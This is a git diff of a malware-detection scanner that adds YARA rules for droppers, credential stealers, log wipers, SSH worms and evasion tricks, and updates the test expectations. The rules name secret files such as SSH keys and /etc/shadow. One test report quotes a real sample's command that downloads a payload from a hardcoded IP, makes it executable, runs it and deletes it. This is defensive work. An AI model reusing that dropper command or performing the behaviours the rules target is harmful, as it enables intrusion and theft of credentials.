diff --git a/Makefile b/Makefile
index ccbb1cac3..4522abbb5 100644
--- a/Makefile
+++ b/Makefile
@@ -48,7 +48,7 @@ fix: $(FIXERS)
# END: lint-install ../bincapz
SAMPLES_REPO ?= chainguard-dev/bincapz-samples
-SAMPLES_COMMIT ?= bdcb8c2e9bf557a0abe3e2b0144f437d456299b7
+SAMPLES_COMMIT ?= b112eaf9bc547b2d219dfa775e0eff2874b30b9f
OUT_DIR=out/samples-$(SAMPLES_COMMIT).tmp
out/samples-$(SAMPLES_COMMIT):
mkdir -p out
diff --git a/pkg/action/programkind.go b/pkg/action/programkind.go
index 41761a48a..c0aae904c 100644
--- a/pkg/action/programkind.go
+++ b/pkg/action/programkind.go
@@ -55,6 +55,7 @@ var extMap = map[string]string{
".md": "",
".php": "PHP file",
".pl": "PERL script",
+ ".ps1": "Powershell",
".py": "Python script",
".pyc": "Python script (compiled)",
".rb": "Ruby script",
diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive
index c480cc44a..a068288e8 100644
--- a/pkg/action/testdata/scan_archive
+++ b/pkg/action/testdata/scan_archive
@@ -26,6 +26,7 @@ fs/directory/list
fs/directory/remove
fs/fifo/create
fs/file/delete
+fs/file/delete/forcibly
fs/file/read
fs/file/stat
fs/file/write
diff --git a/rules/combo/backdoor/remote_eval.yara b/rules/combo/backdoor/remote_eval.yara
index de89b4266..9bc323975 100644
--- a/rules/combo/backdoor/remote_eval.yara
+++ b/rules/combo/backdoor/remote_eval.yara
@@ -7,9 +7,11 @@ rule remote_eval : critical {
hash_2024_analyze_me_1_0_0_setup = "ca9c74630ed814053220129ee6c43668e66898983d9be5e34b406bbd3ad95b1e"
strings:
$http = "http"
- $eval_open_ruby = /eval\(open[\(\)\"\'\-\w:\/\.]{0,32}/
- $exec_requests = /exec\(requests\.get[\(\)\"\'\-\w:\/\.]{0,32}/
- $eval_requests = /eval\(requests\.get[\(\)\"\'\-\w:\/\.]{0,32}/
+ $eval_open_ruby = /eval\(open[\(\)\"\'\-\w:\/\.]{0,64}/
+ $exec_requests = /exec\(requests\.get[\(\)\"\'\-\w:\/\.]{0,64}/
+ $eval_requests = /eval\(requests\.get[\(\)\"\'\-\w:\/\.]{0,64}/
+ $eval_urllib = /exec\(urllib\.request\.urlopen\([\(\)\"\'\-\w:\/\.]{0,64}\).read\(\)/
+ $exec_urllib = /exec\(urllib\.request\.urlopen\([\(\)\"\'\-\w:\/\.]{0,64}\).read\(\)/
condition:
filesize < 65535 and $http and any of ($e*)
}
diff --git a/rules/combo/dropper/powershell.yara b/rules/combo/dropper/powershell.yara
new file mode 100644
index 000000000..71b21cff2
--- /dev/null
+++ b/rules/combo/dropper/powershell.yara
@@ -0,0 +1,13 @@
+
+rule powershell_base64_dropper : critical {
+ meta:
+ description = "Powershell base64 dropper"
+ strings:
+ $base64 = "FromBase64String"
+ $write = "WriteAllBytes"
+ $io_file = "System.IO.File"
+ $start_proc = "Start-Process"
+ $file_path = "FilePath"
+ condition:
+ filesize < 2KB and all of them
+}
diff --git a/rules/combo/dropper/shell.yara b/rules/combo/dropper/shell.yara
index 222d6fce4..e5d151294 100644
--- a/rules/combo/dropper/shell.yara
+++ b/rules/combo/dropper/shell.yara
@@ -102,3 +102,50 @@ rule fetch_chmod_execute : high {
condition:
any of them
}
+
+rule possible_dropper : high {
+ meta:
+ description = "downloads and execute a program"
+ strings:
+ $http = "http://"
+ $https = "https://"
+ $tool_curl_o = /curl [\w\.\- :\"\/]{0,64}-\w{0,2}[oO][\w\- :\"\/]{0,64}/
+ $tool_wget_q = "wget -"
+ $tool_lwp = "lwp-download"
+ $cmd_bash = "bash" fullword
+ $cmd_dot_slash = /\.\/[\.\w]{1,16}/ fullword
+ $cmd_rm = "rm" fullword
+ $cmd_sleep = "sleep" fullword
+ $cmd_echo = "echo" fullword
+ $cmd_chmod = "chmod" fullword
+ condition:
+ filesize < 768 and any of ($http*) and any of ($tool*) and any of ($cmd*)
+}
+
+rule nohup_dropper : critical {
+ meta:
+ description = "downloads and executes a program with nohup"
+ strings:
+ $nohup = "nohup" fullword
+ condition:
+ possible_dropper and $nohup
+}
+
+rule obsessive_dropper : critical {
+ meta:
+ description = "invokes multiple tools to download and execute a program"
+ strings:
+ $http = "http://"
+ $https = "https://"
+ $tool_curl_s = "curl -"
+ $tool_wget_q = "wget -"
+ $tool_lwp = "lwp-download"
+ $cmd_bash = "bash" fullword
+ $cmd_dot_slash = /\.\/[\.\w]{1,16}/ fullword
+ $cmd_rm = "rm" fullword
+ $cmd_sleep = "sleep" fullword
+ $cmd_echo = "echo" fullword
+ $cmd_chmod = "chmod" fullword
+ condition:
+ filesize < 768 and any of ($http*) and 2 of ($tool*) and any of ($cmd*)
+}
\ No newline at end of file
diff --git a/rules/combo/stealer/linux_server.yara b/rules/combo/stealer/linux_server.yara
index 9890fb7ef..6c8d76b87 100644
--- a/rules/combo/stealer/linux_server.yara
+++ b/rules/combo/stealer/linux_server.yara
@@ -7,8 +7,19 @@ rule linux_server_stealer : high {
hash_2022_services_api = "fe617c77d66f0954d22d6488e4a481b0f8fdc9e3033fa23475dcd24e53561ec7"
strings:
$bash_history = ".bash_history"
- $root_ssh = "/root/.ssh"
- $id_rsa = ".ssh/id_rsa"
+
+ $other_root_ssh = "/root/.ssh"
+ $other_id_rsa = ".ssh/id_rsa"
+ $other_shadow = "etc/shadow"
+
+ $term_crypto = "crypto" fullword
+ $term_echo = "echo" fullword
+ $term_chmod = "chmod" fullword
+ $term_find = "find" fullword
+ $term_scp = "scp" fullword
+ $term_tar = "tar" fullword
+ $term_crontab = "crontab" fullword
+ $term_http = "http" fullword
condition:
- $bash_history and ($root_ssh or $id_rsa)
+ filesize < 10MB and $bash_history and any of ($other*) and any of ($term*)
}
diff --git a/rules/combo/wiper/bash.yara b/rules/combo/wiper/bash.yara
index fd70c2d66..4a96aaccc 100644
--- a/rules/combo/wiper/bash.yara
+++ b/rules/combo/wiper/bash.yara
@@ -8,5 +8,6 @@ rule sleep_rm_sh_pipe : high {
$s_pipe_sh = "| /bin/sh"
$s_rm_rf = "rm -rf"
condition:
- all of them
+ filesize < 16KB and all of them
}
+
diff --git a/rules/combo/wiper/sensitive_logs.yara b/rules/combo/wiper/sensitive_logs.yara
index f5e6dab80..71ef918dc 100644
--- a/rules/combo/wiper/sensitive_logs.yara
+++ b/rules/combo/wiper/sensitive_logs.yara
@@ -17,6 +17,27 @@ rule system_log_references : high {
$btmp = "/var/log/btmp"
$lastlog = "/var/log/lastlog"
$run_log = "/run/log/"
+ $mail_log = "/var/spool/mail/root"
condition:
filesize < 67108864 and 3 of them
}
+
+rule echo_log_wiper : critical {
+ meta:
+ description = "overwrites critical system logs"
+ strings:
+ $var_spool = /echo.{0,4}\> {0,2}\/var\/spool\/mail\/root/
+ $var_log = /echo.{0,4}\> {0,2}\/var\/log\/\w{0,8}/
+ condition:
+ filesize < 16KB and system_log_references and any of them
+}
+
+rule log_remover : critical {
+ meta:
+ description = "overwrites critical system logs"
+ strings:
+ $var_spool = /rm {1,2}-{0,4}\/var\/spool\/mail\/root/
+ $var_log = /rm {1,2}-{0,4}\/var\/log\/\w{0,8}/
+ condition:
+ filesize < 16KB and system_log_references and any of them
+}
\ No newline at end of file
diff --git a/rules/combo/worm/ssh.yara b/rules/combo/worm/ssh.yara
index de3c9892b..50d1caeed 100644
--- a/rules/combo/worm/ssh.yara
+++ b/rules/combo/worm/ssh.yara
@@ -1,20 +1,34 @@
-rule ssh_snake_worm : high {
+rule ssh_shell_worm : critical {
meta:
- description = "possible SSH worm like SSH-Snake"
- hash_2024_SSH_Snake_Snake_nocomments = "9491fa95f40a69f27ce99229be636030fdc49f315cb9c897db3b602c34a8ceda"
+ description = "SSH worm implemented in shell"
+ hash_2024_SSH_Snake_Snake_nocomments = "9491fa95f40a69f27ce99229be636030fdc49f315cb9c897db3b602c34a8ceda"
hash_2024_SSH_Snake = "b0a2bf48e29c6dfac64f112ac1cb181d184093f582615e54d5fad4c9403408be"
strings:
- $s_dot_ssh = ".ssh"
- $s_authorized_keys = "authorized_keys"
- $h_etc_hosts = "/etc/hosts"
- $h_getent = "getent ahostsv4"
- $u_base64 = "base64"
- $u_uname = "uname"
- $strict_host = "StrictHostKeyChecking"
- $user_known_hosts = "UserKnownHostsFile"
+ $dot_ssh = ".ssh" fullword
+
+ $key_pem = ".pem" fullword
+ $key_rsa = "id_rsa" fullword
+ $key_identity_file = "IdentityFile" fullword
+
+ $hosts_authorized_keys = "authorized_keys"
+ $hosts_etc_hosts = "/etc/hosts"
+ $hosts_getent = "getent ahostsv4"
+ $hosts_ssh_config = /grep.{1,8}HostName.{1,8}\/\.ssh\/config/
+ $hosts_bash_history = /(scp|ssh).{2,64}bash_history/
+ $hosts_known_hosts = "known_hosts"
+
+ $remote_base64 = "base64"
+ $remote_uname = "uname"
+ $remote_curl = "curl -"
+ $remote_wget = "wget"
+ $remote_lwp = "lwp-download"
+
+ $ssh_strict_host = "StrictHostKeyChecking"
+ $ssh_known_hosts = "UserKnownHostsFile"
+ $ssh_connect_timeout = "ConnectTimeout"
condition:
- filesize < 67108864 and $strict_host and $user_known_hosts and all of ($s*) and any of ($h*) and any of ($u*)
+ filesize < 32KB and $dot_ssh and 2 of ($ssh*) and 1 of ($remote*) and 3 of ($hosts*) and any of ($key*)
}
rule ssh_worm_router : high {
@@ -34,3 +48,5 @@ rule ssh_worm_router : high {
condition:
all of ($s*) and any of ($h*) and any of ($p*)
}
+
+
diff --git a/rules/crypto/mining/tls_dp_port.yara b/rules/crypto/mining/tls_dp_port.yara
new file mode 100644
index 000000000..4f3612ba6
--- /dev/null
+++ b/rules/crypto/mining/tls_dp_port.yara
@@ -0,0 +1,9 @@
+
+rule tls_dp_port : critical {
+ meta:
+ description = "contains cryptominer command-line"
+ strings:
+ $ref = /-p \d+ -tls -dp \d+/
+ condition:
+ any of them
+}
diff --git a/rules/evasion/base64-decode.yara b/rules/evasion/base64-decode.yara
index 28b40e30b..f3b052e3c 100644
--- a/rules/evasion/base64-decode.yara
+++ b/rules/evasion/base64-decode.yara
@@ -42,7 +42,7 @@ rule powershell_decode : medium {
description = "decode base64 strings"
ref = "https://learn.microsoft.com/en-us/dotnet/api/system.convert.frombase64string?view=net-8.0"
strings:
- $ref = "[System.Convert]::FromBase64String" ascii
+ $ref = /System\.Convert[\]: ]+FromBase64String/ ascii
condition:
any of them
}
diff --git a/rules/evasion/copy_run_delete.yara b/rules/evasion/copy_run_delete.yara
new file mode 100644
index 000000000..0ba690597
--- /dev/null
+++ b/rules/evasion/copy_run_delete.yara
@@ -0,0 +1,18 @@
+
+rule copy_run_delete : critical {
+ meta:
+ description = "copy executable, run, and delete"
+ strings:
+ $cp = "cp -f"
+ $rm = /rm [\-\w ]{0,4}f[ \$\w\/\.]{0,32}/
+ $null = "/dev/null"
+ $path_tmp = "/tmp"
+ $path_bin = "/bin"
+ $path_var = "/var/"
+ $path_dev_shm = "/dev/shm"
+ $run_quoted = /\"\$[\w\-\/\$]{1,12}\"/ fullword
+ $run_dot_slash = /\.\/[\-\w\$]{1,12}/ fullword
+ condition:
+ filesize < 256 and $cp and $rm and $null and any of ($path*) and any of ($run*)
+}
+
diff --git a/rules/evasion/fake-process-name.yara b/rules/evasion/fake-process-name.yara
index d4cb05619..3eb1941d6 100644
--- a/rules/evasion/fake-process-name.yara
+++ b/rules/evasion/fake-process-name.yara
@@ -24,3 +24,12 @@ rule fake_syslogd : critical {
condition:
any of them
}
+
+rule fake_bash_val : high {
+ meta:
+ description = "Pretends to be a bash process"
+ strings:
+ $bash = "-bash" fullword
+ condition:
+ filesize < 8KB and $bash
+}
diff --git a/rules/evasion/run_sleep_delete.yara b/rules/evasion/run_sleep_delete.yara
index 7ec38b001..8517ee494 100644
--- a/rules/evasion/run_sleep_delete.yara
+++ b/rules/evasion/run_sleep_delete.yara
@@ -1,5 +1,5 @@
-rule run_and_delete : critical {
+rule run_sleep_delete : critical {
meta:
description = "run executable, sleep, and delete"
hash_2024_Downloads_4ba700b0e86da21d3dcd6b450893901c252bf817bd8792548fc8f389ee5aec78 = "fd3e21b8e2d8acf196cb63a23fc336d7078e72c2c3e168ee7851ea2bef713588"
@@ -14,3 +14,19 @@ rule run_and_delete : critical {
filesize < 64KB and all of them
}
+rule fetch_run_sleep_delete : critical {
+ meta:
+ description = "fetch, run executable, sleep, and delete"
+ strings:
+ $url = /https*:\/\/[\w][\w\.\/\-_\?=\@]{8,64}/
+ $sleep = /sleep \d{1,2}/ fullword
+ $rm = /rm [\-\w ]{0,4}f[ \$\w\/\.]{0,32}/
+ $path_tmp = "/tmp"
+ $path_var = "/var/"
+ $path_dev_shm = "/dev/shm"
+ $run_quoted = /\"\$[\-\w\/\$]{1,12}\"/ fullword
+ $run_dot_slash = /\.\/[\-\w\$]{1,12}/ fullword
+ condition:
+ filesize < 1KB and $url and $sleep and $rm and any of ($path*) and any of ($run*)
+}
+
diff --git a/rules/fd/write.yara b/rules/fd/write.yara
index 8fef6c039..cd80a36ab 100644
--- a/rules/fd/write.yara
+++ b/rules/fd/write.yara
@@ -34,3 +34,4 @@ rule py_fd_write {
condition:
any of them
}
+
diff --git a/rules/fs/file-copy.yara b/rules/fs/file-copy.yara
new file mode 100644
index 000000000..4f1823218
--- /dev/null
+++ b/rules/fs/file-copy.yara
@@ -0,0 +1,16 @@
+rule file_copy : medium {
+ meta:
+ description = "copy files using cp"
+ strings:
+ $ref = /cp [-\w ]{0,2}[ \$\w\/\.\-]{0,32}/ fullword
+ condition:
+ any of them
+}
+rule file_copy_force : medium {
+ meta:
+ description = "forcibly copy files using cp -f"
+ strings:
+ $ref = /cp [-\w ]{0,2}f [ \$\w\/\.\-]{0,32}/ fullword
+ condition:
+ any of them
+}
\ No newline at end of file
diff --git a/rules/fs/file-delete-forcibly.yara b/rules/fs/file-delete-forcibly.yara
index 15db66dbf..629e630af 100644
--- a/rules/fs/file-delete-forcibly.yara
+++ b/rules/fs/file-delete-forcibly.yara
@@ -1,16 +1,16 @@
rule rm_force {
meta:
- description = "Forcibly deletes files using rm"
+ description = "Forcibly deletes files"
strings:
- $ref = /rm [\-\w ]{0,4}-f[ \$\w\/\.]{0,32}/
+ $ref = /rm [\-\w ]{0,4}-[f[ \$\w\/\.]{0,32}/
condition:
$ref
}
rule rm_recursive_force : medium {
meta:
- description = "Forcibly recursively deletes files using rm -R"
+ description = "Forcibly deletes files recursively"
hash_2023_anarchy = "1a6f8d758c6e569109a021c01cc4a5e787a9c876866c0ce5a15f07f266ec8059"
hash_2019_test_compass_test = "6647a368750892a379bb483096910fc3729312e6b2eb6bb964da8062013e300a"
hash_2019_test_sass_test = "fdcb3a53bb071031a5c44d0a7d554a085dceb9ed393a5e3940fda4471698c186"
diff --git a/rules/fs/file-write.yara b/rules/fs/file-write.yara
index f628ce073..f9a5285f2 100644
--- a/rules/fs/file-write.yara
+++ b/rules/fs/file-write.yara
@@ -16,3 +16,14 @@ rule python_file_write {
condition:
any of them
}
+
+
+rule powershell_fs_write {
+ meta:
+ description = "writes content to disk"
+ syscall = "pwrite"
+ strings:
+ $write_val = "System.IO.File]::WriteAllBytes"
+ condition:
+ any of them
+}
diff --git a/rules/fs/tempdir.yara b/rules/fs/tempdir.yara
index 3162556d3..fa8775294 100644
--- a/rules/fs/tempdir.yara
+++ b/rules/fs/tempdir.yara
@@ -8,6 +8,7 @@ rule tempdir {
$tempdir = "TEMPDIR" fullword
$tmpdir = "TMPDIR" fullword
$cocoa = "NSTemporaryDirectory" fullword
+ $powershell = "GetTempPath" fullword
condition:
any of them
}
diff --git a/rules/net/fetch.yara b/rules/net/fetch.yara
index de13fe42c..1763054ac 100644
--- a/rules/net/fetch.yara
+++ b/rules/net/fetch.yara
@@ -18,7 +18,7 @@ rule curl_download_val : medium {
hash_2023_Downloads_6e35 = "6e35b5670953b6ab15e3eb062b8a594d58936dd93ca382bbb3ebdbf076a1f83b"
hash_2023_Downloads_9929 = "99296550ab836f29ab7b45f18f1a1cb17a102bb81cad83561f615f3a707887d7"
strings:
- $ref = /curl [\w\.\- :\"\/]{0,64}-[oO][\w\- :\"\/]{0,64}/
+ $ref = /curl [\w\.\- :\"\/]{0,64}-\w{0,2}[oO][\w\- :\"\/]{0,64}/
condition:
$ref
}
diff --git a/rules/process/chdir-unusual.yara b/rules/process/chdir-unusual.yara
index f197e9414..7dd7000a0 100644
--- a/rules/process/chdir-unusual.yara
+++ b/rules/process/chdir-unusual.yara
@@ -8,6 +8,7 @@ rule unusual_cd_val : high {
strings:
$d_mnt = "cd /mnt"
$d_root = "cd /root"
+ $d_bin = "cd /bin"
$d_tmp = "cd /tmp"
$d_usr = /cd \/usr[\/\w\.]{0,16}/
$d_var_log = "cd /var/log"
diff --git a/rules/ref/path/dev-shm.yara b/rules/ref/path/dev-shm.yara
index 49feaafc3..d4b512207 100644
--- a/rules/ref/path/dev-shm.yara
+++ b/rules/ref/path/dev-shm.yara
@@ -1,7 +1,7 @@
rule dev_shm : medium {
meta:
- description = "references /dev/shm (world writeable)"
+ description = "references path within /dev/shm (world writeable)"
strings:
$ref = /\/dev\/shm\/[\%\w\-\/\.]{0,64}/
condition:
diff --git a/rules/ref/site/github_comment_attachment.yara b/rules/ref/site/github_attachment.yara
similarity index 71%
rename from rules/ref/site/github_comment_attachment.yara
rename to rules/ref/site/github_attachment.yara
index 0af5140a0..569d42f95 100644
--- a/rules/ref/site/github_comment_attachment.yara
+++ b/rules/ref/site/github_attachment.yara
@@ -1,8 +1,8 @@
-rule github_comment_attachment : high {
+rule github_attachment : high {
meta:
ref = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/redline-stealer-a-novel-approach/"
- description = "references a GitHub comment attachment, sometimes used to distribute malware"
+ description = "references a GitHub comment attachment"
hash_2024_synthetic_github_attach_fetch = "fd2f0e9cf4288d2be6b22bd0c6e8a5eb99777939c9b2278ecf89f5b8ad536719"
strings:
$ref = /github\.com\/\w{0,32}\/\w{0,32}\/files\/\d{0,16}\/[\w\.\-]{0,64}/
diff --git a/rules/shell/nohup.yara b/rules/shell/nohup.yara
index c988eeb63..5adbe4221 100644
--- a/rules/shell/nohup.yara
+++ b/rules/shell/nohup.yara
@@ -12,10 +12,8 @@ rule nohup_reference_value : medium {
$not_usage = "usage: nohup"
$not_nohup_out = "nohup.out"
$not_pushd = "pushd"
- $bin_sh = "#!/bin/sh"
- $bin_bash = "#!/bin/bash"
condition:
- filesize < 52428800 and any of ($nohup*) and none of ($not*) and not $bin_sh in (0..2) and not $bin_bash in (0..2)
+ filesize < 52428800 and any of ($nohup*) and none of ($not*)
}
rule elf_nohup : high {
diff --git a/test_data/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/test_data/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple
index 872750817..3bef1258c 100644
--- a/test_data/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple
+++ b/test_data/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple
@@ -32,6 +32,7 @@ fs/directory/create
fs/directory/remove
fs/fifo/create
fs/file/delete
+fs/file/delete/forcibly
fs/file/times/set
fs/file/truncate
fs/file/write
diff --git a/test_data/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/test_data/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple
index 6b441f68f..945a6372c 100644
--- a/test_data/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple
+++ b/test_data/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple
@@ -31,6 +31,7 @@ fs/directory/create
fs/directory/remove
fs/fifo/create
fs/file/delete
+fs/file/delete/forcibly
fs/file/times/set
fs/file/truncate
fs/file/write
diff --git a/test_data/javascript/clean/highlight.esm.js.simple b/test_data/javascript/clean/highlight.esm.js.simple
index 685ae9b0f..cc64690a1 100644
--- a/test_data/javascript/clean/highlight.esm.js.simple
+++ b/test_data/javascript/clean/highlight.esm.js.simple
@@ -18,6 +18,7 @@ exec/program/background
fs/directory/create
fs/directory/remove
fs/file/capabilities/set
+fs/file/copy
fs/file/delete
fs/file/times/set
fs/link/read
diff --git a/test_data/javascript/clean/highlight.js.simple b/test_data/javascript/clean/highlight.js.simple
index 211572913..16eed8471 100644
--- a/test_data/javascript/clean/highlight.js.simple
+++ b/test_data/javascript/clean/highlight.js.simple
@@ -18,6 +18,7 @@ exec/program/background
fs/directory/create
fs/directory/remove
fs/file/capabilities/set
+fs/file/copy
fs/file/delete
fs/file/times/set
fs/link/read
diff --git a/test_data/javascript/clean/php.js.simple b/test_data/javascript/clean/php.js.simple
index b4c51e376..ce7dc7b98 100644
--- a/test_data/javascript/clean/php.js.simple
+++ b/test_data/javascript/clean/php.js.simple
@@ -14,6 +14,7 @@ fs/directory/create
fs/directory/remove
fs/fifo/create
fs/file/delete
+fs/file/delete/forcibly
fs/file/truncate
fs/link/read
fs/lock/update
diff --git a/test_data/linux/2024.Darkcracks/darkcracks.sh.md b/test_data/linux/2024.Darkcracks/darkcracks.sh.md
index 56f507d54..1c694b22d 100644
--- a/test_data/linux/2024.Darkcracks/darkcracks.sh.md
+++ b/test_data/linux/2024.Darkcracks/darkcracks.sh.md
@@ -3,7 +3,7 @@
| RISK | KEY | DESCRIPTION | EVIDENCE |
|----------|-----------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| CRITICAL | [combo/dropper/shell](https://github.com/chainguard-dev/bincapz/blob/main/rules/combo/dropper/shell.yara#curl_chmod_relative_run_tiny) | change dir, fetch file, make it executable, and run it | [./agr](https://github.com/search?q=.%2Fagr&type=code)
[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code)
[chmod](https://github.com/search?q=chmod&type=code)
[curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o agr](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o+agr&type=code) |
-| CRITICAL | [evasion/run_sleep_delete](https://github.com/chainguard-dev/bincapz/blob/main/rules/evasion/run_sleep_delete.yara#run_and_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) |
+| CRITICAL | [evasion/run_sleep_delete](https://github.com/chainguard-dev/bincapz/blob/main/rules/evasion/run_sleep_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)
[chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)
[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)
[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)
[sleep 3](https://github.com/search?q=sleep+3&type=code) |
| HIGH | [process/chdir/unusual](https://github.com/chainguard-dev/bincapz/blob/main/rules/process/chdir-unusual.yara#unusual_cd_val) | changes to an unusual system directory | [cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)
[cd /root](https://github.com/search?q=cd+%2Froot&type=code)
[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)
[cd /var/run](https://github.com/search?q=cd+%2Fvar%2Frun&type=code) |
| HIGH | [ref/ip_port](https://github.com/chainguard-dev/bincapz/blob/main/rules/ref/ip_port.yara#hardcoded_ip_port) | hardcoded IP:port destination | [179.191.68.85:82](https://github.com/search?q=179.191.68.85%3A82&type=code) |
| HIGH | [ref/site/http/ip](https://github.com/chainguard-dev/bincapz/blob/main/rules/ref/site/http-ip.yara#http_hardcoded_ip) | hardcoded IP address within a URL | [http://179.191.68.85:82/vendor/sebastian/diff/src/Ex](http://179.191.68.85:82/vendor/sebastian/diff/src/Ex) |
diff --git a/test_data/linux/2024.hadooken/crondr_as_bash.sh.simple b/test_data/linux/2024.hadooken/crondr_as_bash.sh.simple
new file mode 100644
index 000000000..4d3b4d925
--- /dev/null
+++ b/test_data/linux/2024.hadooken/crondr_as_bash.sh.simple
@@ -0,0 +1,12 @@
+# linux/2024.hadooken/crondr_as_bash.sh
+crypto/mining/tls_dp_port
+evasion/copy_run_delete
+evasion/fake/process/name
+fs/file/copy
+fs/file/delete/forcibly
+process/chdir
+process/chdir/unusual
+ref/path/relative
+shell/exec
+shell/ignore_output
+shell/unusual_redirect
diff --git a/test_data/linux/2024.hadooken/drop1.sh.simple b/test_data/linux/2024.hadooken/drop1.sh.simple
new file mode 100644
index 000000000..508f2190e
--- /dev/null
+++ b/test_data/linux/2024.hadooken/drop1.sh.simple
@@ -0,0 +1,18 @@
+# linux/2024.hadooken/drop1.sh
+3P/threat_hunting/base64
+combo/dropper/shell
+data/embedded/base64/url
+encoding/base64
+evasion/base64/eval
+evasion/base64/external/decoder
+evasion/base64/python
+fs/file/delete
+fs/file/delete/forcibly
+net/download
+net/fetch
+ref/ip
+ref/path/tmp
+ref/site/http/ip
+ref/site/url
+shell/pipe_sh
+shell/tmp_semicolon
diff --git a/test_data/linux/2024.hadooken/drop2.sh.simple b/test_data/linux/2024.hadooken/drop2.sh.simple
new file mode 100644
index 000000000..73ae3ecb0
--- /dev/null
+++ b/test_data/linux/2024.hadooken/drop2.sh.simple
@@ -0,0 +1,9 @@
+# linux/2024.hadooken/drop2.sh
+combo/backdoor/remote_eval
+fd/read
+net/url
+net/url/request
+ref/ip
+ref/site/http/ip
+ref/site/url
+techniques/code_eval
diff --git a/test_data/linux/2024.hadooken/drop3.sh.simple b/test_data/linux/2024.hadooken/drop3.sh.simple
new file mode 100644
index 000000000..33d10800b
--- /dev/null
+++ b/test_data/linux/2024.hadooken/drop3.sh.simple
@@ -0,0 +1,6 @@
+# linux/2024.hadooken/drop3.sh
+evasion/run_sleep_delete
+fs/file/delete/forcibly
+ref/ip
+ref/site/http/ip
+ref/site/url
diff --git a/test_data/linux/2024.hadooken/figure4.py.simple b/test_data/linux/2024.hadooken/figure4.py.simple
new file mode 100644
index 000000000..b3ae81171
--- /dev/null
+++ b/test_data/linux/2024.hadooken/figure4.py.simple
@@ -0,0 +1,14 @@
+# linux/2024.hadooken/figure4.py
+combo/dropper/python
+exec/program
+fd/read
+fd/write
+fs/permission/modify
+net/download
+net/url
+net/url/request
+ref/ip
+ref/path/dev
+ref/path/var
+ref/site/http/ip
+ref/site/url
diff --git a/test_data/linux/2024.hadooken/ssh_worm.sh.simple b/test_data/linux/2024.hadooken/ssh_worm.sh.simple
new file mode 100644
index 000000000..8f8ae1d95
--- /dev/null
+++ b/test_data/linux/2024.hadooken/ssh_worm.sh.simple
@@ -0,0 +1,26 @@
+# linux/2024.hadooken/ssh_worm.sh
+3P/threat_hunting/base64
+combo/dropper/shell
+combo/stealer/linux_server
+combo/worm/ssh
+data/embedded/base64/url
+encoding/base64
+evasion/base64/eval
+evasion/base64/external/decoder
+evasion/base64/python
+fs/file/delete
+fs/file/delete/forcibly
+fs/file/times/set
+fs/permission/modify
+net/download
+net/fetch
+ref/path/hidden
+ref/path/home
+ref/path/root
+ref/path/tmp
+ref/site/http/ip
+ref/site/url
+secrets/bash_history
+secrets/ssh
+shell/pipe_sh
+shell/tmp_semicolon
diff --git a/test_data/linux/2024.hadooken/wipe_logs.sh.simple b/test_data/linux/2024.hadooken/wipe_logs.sh.simple
new file mode 100644
index 000000000..86b541fc5
--- /dev/null
+++ b/test_data/linux/2024.hadooken/wipe_logs.sh.simple
@@ -0,0 +1,5 @@
+# linux/2024.hadooken/wipe_logs.sh
+admin/logs/current_logins
+combo/wiper/sensitive_logs
+ref/path/var
+ref/path/var/log
diff --git a/test_data/linux/clean/caddy.simple b/test_data/linux/clean/caddy.simple
index 4eb3caf44..95cdae758 100644
--- a/test_data/linux/clean/caddy.simple
+++ b/test_data/linux/clean/caddy.simple
@@ -42,6 +42,7 @@ fs/directory/remove
fs/fifo/create
fs/file/capabilities/set
fs/file/delete
+fs/file/delete/forcibly
fs/file/read
fs/file/times/set
fs/file/write
diff --git a/test_data/linux/clean/chezmoi.simple b/test_data/linux/clean/chezmoi.simple
index f9ba03312..2a3061a70 100644
--- a/test_data/linux/clean/chezmoi.simple
+++ b/test_data/linux/clean/chezmoi.simple
@@ -50,6 +50,7 @@ fs/directory/list
fs/directory/remove
fs/fifo/create
fs/file/delete
+fs/file/delete/forcibly
fs/file/read
fs/file/stat
fs/file/times/set
diff --git a/test_data/linux/clean/libsystemd.so.0.simple b/test_data/linux/clean/libsystemd.so.0.simple
index 08f205e73..0e8a038c4 100644
--- a/test_data/linux/clean/libsystemd.so.0.simple
+++ b/test_data/linux/clean/libsystemd.so.0.simple
@@ -3,6 +3,7 @@ env/TERM
env/USER
exec/program
fd/epoll
+fs/file/copy
fs/file/delete
fs/file/truncate
fs/link/read
